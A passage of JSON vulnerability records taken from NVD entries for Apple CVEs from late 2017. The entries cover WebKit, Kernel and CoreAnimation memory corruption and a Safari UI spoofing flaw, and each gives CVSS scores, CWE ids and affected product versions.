"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7151"], "modified": "2019-04-05T18:32:00", "cpe": [], "id": "CVE-2017-7151", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7151", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:55", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"CoreAnimation\" component. 
It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7171", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7171"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-7171", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7171", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:24:30", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. 
It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13904", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13904"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13904", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13904", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:24:12", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13885", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13885"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-13885", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13885", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T13:24:13", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13884", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-13884", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13884", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T13:22:51", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13856", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856"], "modified": "2019-03-22T19:19:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-13856", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13856", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:23:35", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13870", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13870"], "modified": "2019-03-22T19:20:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-13870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13870", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:23:25", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13866", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13866"], "modified": "2019-03-22T19:19:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-13866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13866", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:33:48", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted web site that sends a 401 Unauthorized redirect.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7153", "cwe": ["CWE-601"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7153"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-7153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7153", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:33:47", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and applicatio